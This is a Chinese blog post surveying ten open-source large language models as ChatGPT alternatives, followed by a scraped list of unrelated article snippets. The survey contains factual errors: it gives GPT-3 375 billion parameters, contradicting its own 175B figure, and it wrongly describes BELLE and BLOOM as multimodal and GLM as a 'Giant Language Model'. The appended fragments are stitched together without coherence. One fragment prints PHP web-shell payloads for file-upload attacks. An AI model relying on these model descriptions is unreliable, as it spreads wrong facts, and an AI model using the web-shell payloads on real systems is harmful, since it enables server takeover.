MCNU云原生

十大开源GPT替代模型，实现属于你自己的chatGPT

文章目录

- - LLaMA
  - Alpaca
  - Alpaca-LoRA
  - Chinese-Vicuna
  - BLOOM
  - BELLE
  - T5
  - BERT
  - OPT
  - GLM

公众号： MCNU云原生，文章首发地，欢迎微信搜索关注，更多干货，第一时间掌握！

今年chatGPT真的是出尽了风头，搞得好像凡是不讲chatGPT的都是村里还没通网络的，各种技术平台也是充斥着人工智能的相关文章，凡是不谈人工智能的感觉都要跟不上时代了~

社区里面不少朋友们都在咨询LLM大预言模型的相关内容，另外都特别纠结不的话用不了chatGPT。于是乎，我认真准备了几天，终于梳理完这篇文章的内容，那就是开源的大语言模型，可以作为chatGPT的替换方案，让每个人都可以拥有自己的大语言模型。

本文梳理出来10个当前最热门、效果最好的10个开源LLM模型，让你体验一把自己玩转模型的快乐。

LLaMA

github项目名称：facebookresearch/llama
Star数量：21.5K

LLaMA是Large Language Model Meta AI的缩写，它是Meta开源的一个基础大语言模型，它具有多个模型版本，参数规模从70亿、130亿到300亿、650亿，其中LLaMA-13B在大多数基准上超过了GPT-3（175B），而LLaMA-65B与最好的模型Chinchilla70B和PaLM-540B相比也具有竞争力。

LLaMA是一种先进的基础大语言模型，旨在帮助研究人员推进他们在 AI 子领域的工作，LLaMA 等更小、性能更高的模型使得基础设施资源有限的研究者们也可以玩转大语言模型。

LLaMA需要更少的算力，适合对各种任务进行微调在生成创意文本、解决数学定理、回答阅读理解问题等方面表现优秀。

Alpaca

github项目名称：tatsu-lab/stanford_alpaca
Star数量：23.9K

Alpaca模型是stanford开源的一种轻量级的语言模型，它可以根据用户输入的指令来生成不同类型的文本，例如邮件、社交媒体、生产性工具等。Alpaca模型是基于LLaMA模型微调而来的，LLaMA模型是Meta公司发布的一系列大规模的预训练语言模型。

Alpaca模型的训练方法分为两个部分：第一部分是使用self-instruct思想，利用text-davinci-003模型来自动生成指令和输出的数据集；第二部分是在这个数据集上通过监督学习来微调LLaMA模型。Alpaca模型的训练成本非常低，只需要在8张A100 80G上训练3个小时，花费不到100美元。

Alpaca模型的性能也非常出色，在单轮指令执行的效果上，Alpaca模型的回复质量和text-davinci-003模型相当，但是Alpaca模型的参数量只有7B，而text-davinci-003模型的参数量有175B。Alpaca模型还可以适用于消费级显卡，通过使用LoRA技术来降低内存占用和计算量。

Alpaca模型是一个开源的项目，它继承了LLaMA模型的开源协议，仅限于学术研究，其模型的训练数据和代码都可以在GitHub上找到。

alpaca这个词还有另一个意思，是一种南美洲的驼科动物，它和羊驼很像，但是通常比羊驼小一些,所以也被人们称为“羊驼模型”。

alpaca发布以后，在国内广受欢迎，属于非常热门的一个替代模型。

Alpaca-LoRA

github项目名称：tloen/alpaca-lora
Star数量：14.7K

alpaca-lora模型是一种使用lora技术在llama模型上进行微调的轻量级语言模型，它可以根据用户输入的指令来生成不同类型的文本，例如邮件、社交媒体、生产性工具等。alpaca-lora模型是基于alpaca模型改进而来的，alpaca模型是Stanford大学的研究者开源的，它是基于Meta公司的llama模型微调而来的。

lora技术是一种低秩适应（low-rank adaptation）的技术，它可以在冻结原模型llama参数的情况下，通过往模型中加入额外的网络层，并只训练这些新增的网络层参数。由于这些新增参数数量较少，这样不仅微调的成本显著下降，还能获得和全模型微调类似的效果。

alpaca-lora模型的训练方法分为两个部分：第一部分是使用self-instruct思想，利用text-davinci-003模型来自动生成指令和输出的数据集；第二部分是在这个数据集上通过监督学习来微调llama模型，并使用lora技术来减少参数量。alpaca-lora模型的训练成本非常低，只需要在一块RTX 4090显卡上训练5个小时，就可以训练出一个与alpaca水平相当的模型。

微调是非常重要的一项能力，实际上很多大语言模型要真正应用于某些特定场景必须经过微调，而lora是进行微调的一个效果比较好的常规方案。

Chinese-Vicuna

github项目名称：Facico/Chinese-Vicuna
Star数量：2.9K

Chinese-Vicuna是一个中文低资源的llama+lora方案，基于LLaMA+instruction数据构建，这个模型的主要特点是对中文更加友好地支持，参数高效，显卡友好，部署简易，使用较少的资源训练出较好地效果。

官方介绍，模型对资源地消耗比较小，例如

在一张2080Ti（11G）上可以对Llama-7B进行指令微调
在一张3090（24G）上可以对Llama-13B进行指令微调
即使是长度为2048的对话，在3090上也可以完成Llama-7B的微调；使用5万条数据即可有不错效果

如果你的需求是尽量少的资源，使用某些垂直场景的数据进行微调，需要对中文更友好地支持，这个模型是个不错的选择。

BLOOM

项目名称（huggingface托管）：bigscience/bloom
Star数量：3.5K

BLOOM模型是bigscience开源的大语言模型，它是BigScience Large Open-science Open-access Multilingual Language Model的缩写。BLOOM是在46种自然语言和13种编程语言上训练的1760亿参数语言模型，其是由数百名研究人员合作开发和发布的。

Bloom模型通过Transformer架构实现，利用自注意力机制和大规模训练数据对语言进行建模。通过在海量文本数据上进行预训练，Bloom模型能够学习到丰富的语言表示和语义知识，从而具备强大的语言理解和生成能力。

BLOOM 的模型架构与 GPT3 非常相似，但是做了一些改进，最突出的特点是千亿级别的参数规模，使得Bloom模型在语言理解和生成任务中能够表现出色，另外BLOOM支持多模态，使得Bloom模型在处理与语言相关的多模态任务时具备优势，如视觉问答、图像描述生成等。

总体来说，BLOOM在语言生成、文本理解和分类、问答、迁移学习、可解释性与可控性方面表现良好，可以在机器翻译、摘要生成、情感分析、对话系统、信息检索等场景应用，目前国内已有部分企业在落地应用。

BELLE

github项目名称：LianjiaTech/BELLE
Star数量：5.3K

BELLE是Be Everyone’s Large Language model Engine的缩写，是一个开源的中文对话大模型，BELLE更关注如何在开源预训练大语言模型的基础上，帮助每一个人都能够得到一个属于自己的、效果尽可能好的具有指令表现能力的语言模型，降低大语言模型、特别是中文大语言模型的研究和应用门槛。

BELLE模型是一种基于深度神经网络的大规模多模态语言模型。它将语言和视觉信息相结合，通过联合学习来理解和生成多模态数据。BELLE模型采用了先进的神经网络架构，如Transformer和卷积神经网络（CNN），以实现对文本和图像等多模态数据的深度表示学习。

BELLE在多模态学习、语言理解与生成能力、视觉问答、视觉推理、图像描述生成等方面表现优秀。

T5

github项目名称：google-research/text-to-text-transfer-transformer
Star数量：5.2K

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QN7ZplUd-1688387606762)(http://image.mcnu.tech/mcnu/T5.jpg)]

T5（Text-to-Text Transfer Transformer）模型是google开源的一种基于Transformer架构的大型预训练语言模型，被广泛应用于自然语言处理（NLP）领域。T5模型以"Text-to-Text"的方式统一了各种NLP任务的表达方式，通过将不同任务转化为文本到文本的转换问题，实现了多任务学习和迁移学习的能力。

T5模型的突出重点能力：

多任务学习：T5模型能够同时处理多个不同的NLP任务，包括机器翻译、文本摘要、问答系统、文本分类等。通过在大规模数据上进行联合训练，T5模型能够学习到通用的语言表示和任务处理能力，从而在多个任务上展现出色的性能。
迁移学习：由于T5模型在多任务学习中进行了大规模预训练，它具备较强的迁移学习能力。这意味着T5模型在新的任务上可以通过微调少量的任务特定数据，快速适应并取得优秀的表现，从而降低了针对不同任务的训练成本和时间。
通用的文本到文本框架：T5模型采用了统一的文本到文本框架，即将输入和输出都表示为文本序列。这种设计使得T5模型能够在处理不同任务时具有一致的表达形式，简化了模型的设计和应用。通过适当的任务描述和输入形式，T5模型可以根据任务的不同进行转换，实现灵活且高效的多任务处理。

T5模型的应用场景：

机器翻译：T5模型可以用于将一个语言翻译成另一个语言，实现高质量的自动翻译，有助于促进跨语言交流和信息传播。
文本摘要：T5模型能够将长文本内容进行概括和提炼，生成简洁准确的文本摘要，有助于处理大量信息和快速获取关键信息。
问答系统：T5模型可以用于问答任务，根据问题提供准确的答案或解决方案，使得问答系统更具智能和实用性。
文本分类：T5模型能够对文本进行分类，识别文本所属的类别或标签，如情感分析、垃圾邮件过滤、新闻分类等。
自动文本生成：T5模型具备强大的文本生成能力，可以生成
自动对话系统：T5模型在对话系统中具有广泛应用。它可以根据用户的输入生成自然流畅的回复，实现智能对话和交互。
文本纠错和改写：T5模型可以用于纠正文本中的拼写错误、语法错误或重写不通顺的句子，提供文本的修正和改进建议。
文本生成和创作助手：T5模型在文本生成领域表现出色，可以用于生成文章、故事、诗歌等各种文本形式，为创作者提供灵感和辅助创作。
信息检索和推荐：T5模型可以用于对用户的查询进行理解，并根据用户需求生成相关的搜索结果或推荐信息，提升信息检索和推荐系统的精准度和个性化程度。
领域专属任务：T5模型具备很强的灵活性和可扩展性，可以通过微调和领域自适应进行定制化，适用于特定领域的任务，如医疗领域的病历摘要、法律领域的法律文件分析等。

T5模型是一种强大的大规模预训练语言模型，在多任务学习和迁移学习方面具备突出能力。它在机器翻译、文本摘要、问答系统、文本分类等任务中展现出色的性能，并在多个应用场景中发挥重要作用，为自然语言处理领域的发展带来了巨大的推动力。

BERT

github项目名称：google-research/bert
Star数量：34.3K

BERT（Bidirectional Encoder Representations from Transformers）模型是一种基于Transformer架构的双向编码器语言模型，被广泛应用于自然语言处理（NLP）领域。BERT模型通过预训练和微调的方式，实现了对文本的深度理解和表征学习，并在多个NLP任务中取得了卓越的性能。

BERT模型的突出重点能力：

双向上下文表示：BERT模型采用双向上下文编码的方式，能够同时利用上下文的信息来理解文本。它通过Masked Language Model（MLM）和Next Sentence Prediction（NSP）任务的预训练，使得模型能够学习到丰富的句子级和词级的上下文表示。
上下文敏感的词向量：BERT模型生成的词向量具有上下文敏感性，即同一个词在不同上下文中可以具有不同的表示。这种能力使得BERT模型能够更好地捕捉词义的多样性和语境的变化，提升了文本理解和表征的准确性。
预训练和微调：BERT模型采用两阶段的训练方式。首先，通过大规模的无标签数据进行预训练，学习通用的语言表示。然后，在特定任务上使用有标签数据进行微调，将模型应用于具体任务并进行优化。这种训练方式使得BERT模型能够充分利用大量无标签数据和少量有标签数据，实现迁移学习和泛化能力的提升。

BERT模型的应用场景：

文本分类和情感分析：BERT模型在文本分类任务中表现出色，能够对文本进行分类和情感分析，如新闻分类、产品评论情感分析等。
问答系统：BERT模型在问答任务中具有优秀的性能，能够根据给定的问题和上下文生成准确的回答，如阅读理解、常识问答等。
命名实体识别和实体关系抽取：BERT模型能够识别文本中的命名实体，并提取实体之间的关系，如人物关系抽取、医疗实体识别等。
机器翻译和文本生成：BERT模型可以应用于机器翻译任务，将一种语言翻译成另一种语言，也可以用于生成自然流畅的文本，如摘要生成、对话系统等。
文本匹配和相似度计算：BERT模型能够判断两段文本之间的相似度或匹配程度，如搜索引擎中的查询和文档匹配、句子相似度计算等。
文本生成和创作助手：BERT模型具备强大的文本生成能力，可以用于生成文章、故事、诗歌等各种文本形式，为创作者提供灵感和辅助创作。
语义理解和句子表征：BERT模型可以将文本句子映射为高质量的语义向量表示，用于计算句子相似度、聚类分析、语义搜索等任务。
领域特定任务：BERT模型可以通过在特定领域进行微调，适用于领域特定的任务，如医疗领域的疾病诊断、法律领域的案例分析等。

BERT模型作为一种强大的双向编码器语言模型，具备双向上下文表示、上下文敏感的词向量和预训练微调等突出能力。它在文本分类、问答系统、命名实体识别、机器翻译等多个NLP任务中取得了显著的性能提升，并在广泛的应用场景中发挥重要作用。

OPT

github项目名称：facebookresearch/metaseq
Star数量：5.9K

OPT是Open Pre-trained Transformers的缩写，是Meta开源的AI模型，它仅支持英文，暂不支持中文。OPT提供了不同规模的参数模型，其参数规模从125 million到175 billion不等，其中OPT-175B是一个拥有 1750 亿个参数的语言模型，使用了 5 个公开数据集的 800 GB 数据进行训练，其他小规模模型的参数包括 1.25 亿、3.5 亿、13 亿、27 亿、67 亿、130 亿和 300 亿等，可以适用于不同的场景和需求。

OPT模型与GPT系列模型类似，都采用了Transformer-Decoder结构，使用了自回归的方式来生成文本,使用了一些先进的分布式训练技术，如Fully Sharded Data Parallel和Tensor Parallelism，以及一些优化策略，如AdamW和gradient clipping，来提高训练效率和稳定性。

OPT刚发布的时候引起了轰动和广泛关注，因为它1750亿参数比GPT3的3750亿的参数更少，但是它的效果却能够对标GPT3，在多个NLP任务中，如文章生成，代码生成，机器翻译，Q&A等，都取得了与GPT-3可比甚至更好的效果，而只用了GPT-3的1/7的计算资源,Meta AI表示，最低只需要16块英伟达V100 GPU，就能训练并部署OPT-175B模型。

OPT模型不仅开源了代码和权重文件，还开源了训练笔记和数据集，方便其他研究者和开发者复现和使用。

GLM

github项目名称：THUDM/ChatGLM-6B，THUDM/ChatGLM-130B
Star数量：25.3K

随着自然语言处理（Natural Language Processing，NLP）领域的快速发展，语言模型的重要性不断凸显。其中，GLM（Giant Language Model）作为一种强大的语言模型，已经在NLP任务中取得了令人瞩目的成果。

GLM模型是基于深度神经网络的语言模型，其主要目标是理解和生成自然语言。GLM采用了Transformer架构，这是一种自注意力机制的模型，能够有效地捕捉输入文本中的上下文关系和语义信息。通过在大规模文本数据上进行预训练，GLM模型能够学习到丰富的语言表示，包括词汇、句法和语义等方面的知识。

GLM模型具有以下几个显著特点：

大规模参数：GLM模型通常拥有数十亿到数百亿的参数量级，能够学习到更丰富、更准确的语言表示。
上下文理解：通过自注意力机制，GLM模型能够准确捕捉到文本中的上下文关系，提高对句子整体含义的理解能力。
多任务学习：GLM模型可以通过联合训练多个NLP任务，共享模型参数，提高模型的泛化能力和效果。

GLM模型可以应用于内容生成、问答系统、分类检索等多个场景，但是推理能力稍微弱一点。

目前清华大学开源的GLM模型比较热门的有GLM-6B和GLM-130B，支持中英文，其中GLM-6B对中文的支持很好，训练和推理需要的资源比较低，开放了API调用，使用门槛较低，在国内的开源社区非常火爆，值得一试。

GLM-130B支持单台A100（40G * 8）或V100（32G * 8）服务器上具有130B参数的推理任务，支持中英双语，支持在NVIDIA、Hygon DCU、Ascend 910、Sunway上的训练和推理。

性能方面，在 7 个零样本 CLUE 数据集（+24.26%）和 5 个零样本 FewCLUE 数据集（+12.75%）上明显优于 ERNIE TITAN 3.0 260B，在 LAMBADA 上优于 GPT-3 175B davinci (+5.0%)、OPT-175B (+6.5%) 和 BLOOM-176B (+13.0%)，略优于 GPT-3 175B (+0.9%) 。

GLM模型的迭代速度很快，社区也很热闹，近期还输出了支持多模态的能力，相信功能会越来越丰富的,能力会越来越强。

以上就是我梳理的10个热门的LLM开源模型，国内采用开源的模型大部分都在这里面了，心动不如行动，有兴趣的童鞋们自己搭建一个试试吧，欢迎交流~

stm32电机驱动模块想要成为糕手。 stm32 单片机嵌入式硬件
电机驱动模块是智能车等电子设备中用于驱动电机运转的重要部件，它能将微控制器输出的控制信号转换为足够的功率和电流来驱动电机。以下为你详细介绍电机驱动模块的相关信息：常见类型1.L298N电机驱动模块特点高电压、大电流驱动能力：能够驱动高达46V的电机，持续输出电流可达2A，瞬间峰值电流能达到3A，适用于驱动各种中小型直流电机。双通道控制：可以同时控制两个直流电机的正反转和调速，也能用于驱动一个步进电
DeepSeek对AI领域的变革性影响分析报告芝士AI吃鱼人工智能 DeepSeek OpenAI
一、引言近年来，人工智能（AI）技术加速演进，而中国开源大模型DeepSeek的崛起，标志着全球AI竞争进入新阶段。其凭借低成本、高性能、开源生态三大核心优势，迅速成为行业焦点。本报告从技术、产业、投资、就业及未来趋势等维度，全面解析DeepSeek对AI领域的深远影响，为集团战略布局提供参考。二、技术突破：算法效率与成本革命架构创新：MOE与MLA技术优化DeepSeek采用混合专家系统（MoE
文件上传漏洞常用payload Werqy3 web安全安全
[极客大挑战2019]UploadGIF89a@eval($_POST[1]);GIF89a$a="a"."s";$b="s"."e"."r"."t";$c=$a.$b;$c($_POST["1"]);
《DeepSeek训练算法：开启高效学习的新大门》人工智能深度学习
在人工智能的浪潮中，大语言模型的发展日新月异。DeepSeek作为其中的佼佼者，凭借其独特的训练算法和高效的学习能力，吸引了众多目光。今天，就让我们深入探究DeepSeek训练算法的独特之处，以及它是如何保证模型实现高效学习的。一、独特的架构基础DeepSeek以Transformer架构为基石，但并非简单沿用，而是进行了深度创新。Transformer架构的核心是注意力机制，这让模型在处理序列数
国内十大工业物联网平台分析报告(2025年) CServer_01 工业物联网工业物联网平台工业物联网平台选型物联网
目录1、工业物联网简介1.1、引言1.2、工业物联网平台架构1.3、工业物联网平台核心功能2、工业物联网发展趋势2.1、总体趋势2.2、技术趋势2.3、市场发展趋势2.4、应用趋势3、工业物联网平台市场预测3.1、工业物联网平台3.2、DCS3.3、实时数据库3.4、SCADA3.5、数字孪生3.6、设备全生命周期管理系统4、主要工业物联网平台供应商介绍4.1、蓝卓4.2、涂鸦智能4.3、中服云4
力扣乘积最大子数组孑么力扣算法 leetcode 职场和发展 java 动态规划贪心算法
动态规划，注意负负得正，dp交换。题目注意这里的dp的乘积要求最大，而两个很大的负数相乘也是大的，因此在每遍历到一个数时要存一个最大值的dp与一个最小值的dp，然后遍历完后再去存ans的dp。由于存在负数，那么会导致最大的变最小的，最小的变最大的。因此还需要维护当前最小值。时间复杂度：O(n)，空间复杂度：O(1)。classSolution{publicintmaxProduct(int[]nu
腾讯云目前支持4种DeepSeek开源大模型部署方案 szqcloud database
企业级的应用，光有大模型能力还不够，推理引擎以外，应用经验、各类原子化能力和现成的应用经验不可或缺。欢迎交流#deepseek腾讯云目前支持4种DeepSeek开源大模型部署方案1、面向开发者开箱即用的HAI方式1）参考：https://mp.weixin.qq.com/s/kZLPfXv3b1sxLSwyRVsEsg2）优势：支持R1，免除购买资源部署的过程，直接开箱使用；参数规模支持1.5B、
AI大模型应用开发实践：3.使用 tiktoken 计算 token 数量 Hugo_Hoo AI大模型应用开发人工智能 AI编程 agi
使用tiktoken计算token数量tiktoken是OpenAI开发的一种BPE分词器。给定一段文本字符串（例如，"tiktokenisgreat!"）和一种编码方式（例如，"cl100k_base"），分词器可以将文本字符串切分成一系列的token（例如，["t","ik","token","is","great","!"]）。将文本字符串切分成token非常有用，因为GPT模型看到的文本就
使用Python中的LangChain库优化消息长度：从聊天历史到模型性能的全面指南 m0_57781768 python langchain easyui
使用Python中的LangChain库优化消息长度：从聊天历史到模型性能的全面指南在现代人工智能应用中，大语言模型（LLM）扮演着越来越重要的角色，尤其是在对话系统、智能助理和其他自然语言处理任务中。然而，所有的模型都有一个有限的上下文窗口，意味着它们可以处理的输入令牌（tokens）数量是有限的。当我们需要处理较长的对话历史或复杂的任务链时，如何管理传递给模型的消息长度变得至关重要。在这篇文章
DeepSeek R1蒸馏版模型部署的实战教程 herosunly DeepSeek从入门到精通 deepseek 大模型人工智能实战教程
大家好，我是herosunly。985院校硕士毕业，现担任算法研究员一职，热衷于大模型算法的研究与应用。曾担任百度千帆大模型比赛、BPAA算法大赛评委，编写微软OpenAI考试认证指导手册。曾获得阿里云天池比赛第一名，CCF比赛第二名，科大讯飞比赛第三名。授权多项发明专利。对机器学习和深度学习拥有自己独到的见解。曾经辅导过若干个非计算机专业的学生进入到算法行业就业。希望和大家一起成长进步。
基于AWS云平台的法律AI应用系统开发方案 weixin_30777913 aws 云计算人工智能 python
该方案可实现法律文档处理速度提升300%+，关键信息提取准确率可达92%以上（基于实际测试数据），适合构建企业级法律智能中台。建议采用分阶段实施策略，优先实现文档解析和智能问答模块。一、技术栈规划层级技术组件说明存储层AWSS3AmazonOpenSearch(向量数据库)存储原始PDF文件支持向量检索的法律知识库AI服务层OpenAIGPT-4APIAmazonSageMaker(LLM微调)A
【LLM】大模型基础--大规模预训练语言模型的开源教程笔记 Langchain 笔记人工智能 langchain llama 大模型产品经理大模型基础
1.引言本文以DataWhale大模型开源教程为学习路线，进行一整个大模型的入门操作什么是语言模型语言模型是一种对词元序列（token）的概率分布，可以用于评估文本序列的合理性并生成新的文本。从生成文本的方式来看，LM（languagemodle）可以简单的分为：自回归模型非自回归模型特点逐字生成文本，每个词的生成都依赖于上文，关联性好一次性生成整个文本序列，不捕捉上文信息优点内容质量高生成速度快
ChatGPT 提示词全网最全案例汇总编程IT圈 chatgpt 人工智能
GPT地址，收藏不迷路：https://ai.cxyquan.com/ChatGPT提示词案例分享充当旅游指南我想让你做一个旅游指南。我会把我的位置写给你，你会推荐一个靠近我的位置的地方。在某些情况下，我还会告诉您我将访问的地方类型。您还会向我推荐靠近我的第一个位置的类似类型的地方。我的第一个建议请求是“我在上海，我只想参观博物馆。”充当时间旅行指南我要你做我的时间旅行向导。我会为您提供我想参观的
【最新】沃德协会管理系统源码+uniapp前端+环境教程 kaui52066 kaui52066精品源码 uni-app 小程序前端开源 php 生活
一.系统介绍一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统，新一代数字化商协会运营管理系统，以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点，实施功能全场景覆盖，一站式解决商协会需求壁垒，有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场，真正做到为构建有影响力的现代化智慧型组织赋能。二.测试环境系统环境：CentOS、运行环
DeepSeek R1 vs ChatGPT o1 实测 7 大场景终极对决网络安全我来了人工智能 AI chatgpt
R1vso1：7大场景终极对决引言你需要的不是「最好」，而是「最合适」想象一下，你面前有两把瑞士军刀：一把刀锋锐利但功能单一，另一把功能繁多但需要时间磨合。你会怎么选？人工智能模型的选择也是如此。DeepSeekR1和ChatGPTo1就像这两把军刀，它们的胜负不在绝对强弱，而在场景适配。根据实测数据，我们将通过编程、教育、创意等7个战场，解剖这两大AI巨头的真实战斗力。一、语言战场当AI成为「读
c#quartz触发_C# 定时调度之Quartz 林John c#quartz触发
工作中我们经常碰到定时或者固定时间点去做一些事情，然后每天到时间点就会去做这样的事情，如果理解这样的场景，我们就要引入今天我们的主角Quartz，其实这个跟数据库的作业类似，但是不仅仅局限于数据库。一：quartZ引入&三大核心对象简介1：在项目中打开Nuget管理，然后搜索QuartZ，现在最新的版本是3.0.7，需要在Framework4.5.2上面使用。2：quartZ的三大核心对象A：IS
我让DeepSeek和ChatGPT互相聊聊两者的区别，大白话版笑死我了前端点线面 chatgpt 人工智能
大家好，我是纸鸢飞飞，今天跟大家一起做一件比较有意思的事情，让DeepSeek和ChatGPT互相聊聊两者的区别，话不多说，马上进入正题。第一版的针锋相对提示词：你是一名资深的自媒体博主，写过很多篇公众号文章爆款，现在写一篇关于DeepSeek和ChatGPT的不同，从而给普通人的启示的文章，注意该文章内容主要分成3个部分。DeepSeek的回答：DeepSeekvsChatGPT：普通人逆袭的启
大学生小组作业工具合集：从任务分配到进度追踪，一键搞定
标题：2025大学生小组作业「救星」指南！5大高效协作工具+避坑攻略，卷王组队必备副标题：从“拖延内耗”到“人均效率狂魔”，这些工具让小组作业变成加分项【小组作业的“爱恨情仇”】2025年开学季，微博话题#小组作业比独自打工难100倍#再次冲上热搜。评论区“血泪史”扎堆：有人为协调会议时间抓狂，有人因文件版本混乱通宵返工，甚至有人因“划水队友”被迫“1拖N”……教育部最新数据显示，超70%的高校课
书籍-《掌握Transformer：从BERT到大模型和Stable Diffusion（第二版）》
书籍：MasteringTransformers:TheJourneyfromBERTtoLargeLanguageModelsandStableDiffusion，2ndEdition作者：SavaşYıldırım，MeysamAsgari-Chenaghlu出版：PacktPublishing编辑：陈萍萍的公主@一点人工一点智能下载：书籍下载-《掌握Transformer：从BERT到大模型
大语言模型（LLM）如何实现上下文的长期记忆？
引言大语言模型（LargeLanguageModels,LLMs），如GPT-4、Claude和LLaMA等，已经在自然语言处理领域展现出卓越的能力。然而，它们在实际应用中常常面临一个核心问题：如何实现上下文的长期记忆？传统LLM的上下文长度通常受限于计算资源和架构设计（如注意力机制），这限制了其处理长文档或保持复杂对话连续性的能力。本篇文章将深入探讨大语言模型的上下文记忆问题，分析其技术难点，并
项目管理五大基本要素是什么项目管理
项目管理的五大基本要素包括：时间、成本、质量、资源、范围。这些要素共同构成了项目成功的基础，通过有效地管理这些要素，项目经理能够确保项目按时、按质、按预算顺利完成。其中，时间管理是确保项目按计划推进的关键，而成本管理则是项目控制的重要方面。本文将深入探讨这些基本要素的定义及其在实际项目管理中的应用，并结合实际案例进行详细分析。一、时间管理、成本管理时间管理和成本管理是项目管理中最为关键的两个要素。
DeepSeek vs ChatGPT：大模型技术路径的“分水岭”与行业颠覆性创新——2025年AI领域生态重构与场景革命深度观察富贵儿 ¥ 人工智能开发语言大数据 python
引言：从“参数竞赛”到“场景战争”的范式转移2025年，全球AI产业正经历从“技术崇拜”到“价值落地”的关键转折。当OpenAI、Google等巨头仍执着于千亿参数堆砌时，中国团队打造的DeepSeek以“场景穿透力”异军突起。这场较量不仅是技术架构的对垒，更是AI商业化逻辑的根本性变革。本文基于独家技术拆解与300+企业落地案例调研，揭示两大模型如何重塑行业规则。一、技术架构革命：MoEvsTr
商业计划书代写?别浪费钱 TNT_13302909089 商业计划书代写商业计划书创业计划书
商业计划书包含的范围很广，但一般离不开以下题目：经营者的理念、市场、客户、比较优势、管理团队、财务预测、风险因素等等。对市场的分析应由大入小，从宏观到微观，以数据为基础，深刻的描述公司/项目在市场中将争取的定位。对比较优势，应在非常清楚本身强弱情况及竞争对手的战略而作分析。至于管理团队，应从各人的背景及经验分析其对公司/项目中不同岗位的作用。财务预测是关键的，应将绝大部分的假设及其所引致的财务影响
婚恋相亲交友父母牵线搭桥红娘助手小程序系统狂团商城小师妹博纳miui52086 微信小程序微信公众平台微信
婚恋相亲交友父母牵线搭桥红娘助手小程序系统助力婚恋平台精准获客与流量提升一、行业背景与用户需求分析随着社会节奏加快和单身人口增长，婚恋相亲交友已成为刚需市场。据统计，中国适婚单身人群已超2.4亿，其中超过60%的年轻人依赖线上平台解决婚恋需求。然而，传统相亲模式存在匹配效率低、信任度不足等问题，而父母牵线搭桥与红娘助手小程序系统的结合，正成为解决痛点的创新方案。此类平台需满足三大核心需求：精准匹配
DeepSeek与ChatGPT：AI语言模型的全面对决四念处茫茫 AI 人工智能 chatgpt 语言模型
DeepSeek与ChatGPT：AI语言模型的全面对决引言：AI语言模型的时代浪潮一、认识DeepSeek与ChatGPT（一）DeepSeek：国产新星的崛起（二）ChatGPT：AI界的开拓者二、DeepSeek与ChatGPT使用指南（一）DeepSeek使用全攻略1.多种使用途径介绍2.功能使用技巧（二）ChatGPT使用秘籍1.访问与使用流程三、深度剖析：功能大比拼（一）文本创作能力（
微信DeepSeek王炸组合金枝玉叶9 程序员知识储备1 程序员知识储备2 vue.js
1.背景信息微信：腾讯旗下的超级社交应用，涵盖通讯、支付、小程序生态等，月活用户超10亿。DeepSeek：专注AGI（通用人工智能）的中国公司，核心产品包括大模型（如DeepSeek-R1、DeepSeek-Chat）、多模态技术及行业解决方案。“王炸组合”：通常指强强联合的顶级合作，可能暗示技术互补或场景融合。2.可能的合作方向AI功能嵌入微信生态：DeepSeek的大模型能力（如对话、搜索、
类的讲解2(继承) 上位机小白*** c#开发语言
--继承:子类实例化的时候,父类构造函数也会跟随执行继承:属于面向对象三大特性之一(封装,继承,多态)/**父类中抽离"公共成员"*子类中"扩展"特殊的成员**基类:父类Animal*派生类:子类Dog**继承的核心思想:子类使用父类公开的属性和方法,同时拓展自己的特性*/先定义一个Animal类,之后用Dog类继承Animal类//调用了无参的构造函数Animallaohu=newAnimal(
【大模型】AI 辅助编程操作实战使用详解小码农叔叔 AI大模型实战与应用 AI 辅助编程操作实战使用详解 AI 辅助编程 AI 编程使用详解 AI编程 AI代码编程
目录一、前言二、AI编程介绍2.1AI编程是什么2.1.1为什么需要AI辅助编程2.2AI编程主要特点2.3AI编程底层核心技术2.4AI编程核心应用场景三、AI代码辅助编程解决方案3.1AI大模型平台3.1.1AI大模型平台代码生成优缺点3.2AI编码插件3.3AI编码工具产品CursorAITabnineGitHubCopilot通义灵码MarsCodeCodeGeeX腾讯云AI代码助手Ope
AI 大模型应用数据中心建设：高性能计算与存储架构 AI天才研究院计算 AI大模型企业级应用开发实战 DeepSeek R1 &大数据AI人工智能大模型 java python javascript kotlin golang 架构人工智能大厂程序员硅基计算碳基计算认知计算生物计算深度学习神经网络大数据 AIGC AGI LLM 系统架构设计软件哲学 Agent 程序员实现财富自由
《AI大模型应用数据中心建设：高性能计算与存储架构》关键词：AI大模型，数据中心建设，高性能计算，存储架构，分布式系统，能耗优化，运维管理。摘要：本文深入探讨了AI大模型应用数据中心建设中的高性能计算与存储架构。首先回顾了AI大模型的发展历程和数据中心的含义，然后详细解析了高性能计算架构，包括计算节点、编程模型和网络技术。接着，讨论了存储架构，包括存储类型、分布式存储系统和数据一致性策略。本文还提
干货：DeepSeek+SpringAI实现流式对话！液态不合群 deepseek
前面一篇文章我们实现了《炸裂：SpringAI内置DeepSeek啦！》，但是大模型的响应速度通常是很慢的，为了避免用户用户能够耐心等待输出的结果，我们通常会使用流式输出一点点将结果输出给用户。那么问题来了，想要实现流式结果输出，后端和前端要如何配合？后端要使用什么技术实现流式输出呢？接下来本文给出具体的实现代码，先看最终实现效果：解决方案在SpringBoot中实现流式输出可以使用Sse（Ser
Algorithm 香水浓 java Algorithm
冒泡排序 public static void sort(Integer[] param) { for (int i = param.length - 1; i > 0; i--) { for (int j = 0; j < i; j++) { int current = param[j]; int next = param[j + 1];
mongoDB 复杂查询表达式开窍的石头 mongodb
1:count Pg: db.user.find().count(); 统计多少条数据 2:不等于$ne Pg: db.user.find({_id:{$ne:3}},{name:1,sex:1,_id:0}); 查询id不等于3的数据。 3：大于$gt $gte(大于等于) &n
Jboss Java heap space异常解决方法, jboss OutOfMemoryError : PermGen space 0624chenhong jvm jboss
转自 http://blog.csdn.net/zou274/article/details/5552630 解决办法： window->preferences->java->installed jres->edit jre 把default vm arguments 的参数设为-Xms64m -Xmx512m ----------------
文件上传下载解析相对路径不懂事的小屁孩文件上传
有点坑吧，弄这么一个简单的东西弄了一天多，身边还有大神指导着，网上各种百度着。下面总结一下遇到的问题：文件上传，在页面上传的时候，不要想着去操作绝对路径，浏览器会对客户端的信息进行保护，避免用户信息收到攻击。在上传图片，或者文件时，使用form表单来操作。前台通过form表单传输一个流到后台，而不是ajax传递参数到后台，代码如下: <form action=&
怎么实现qq空间批量点赞换个号韩国红果果 qq
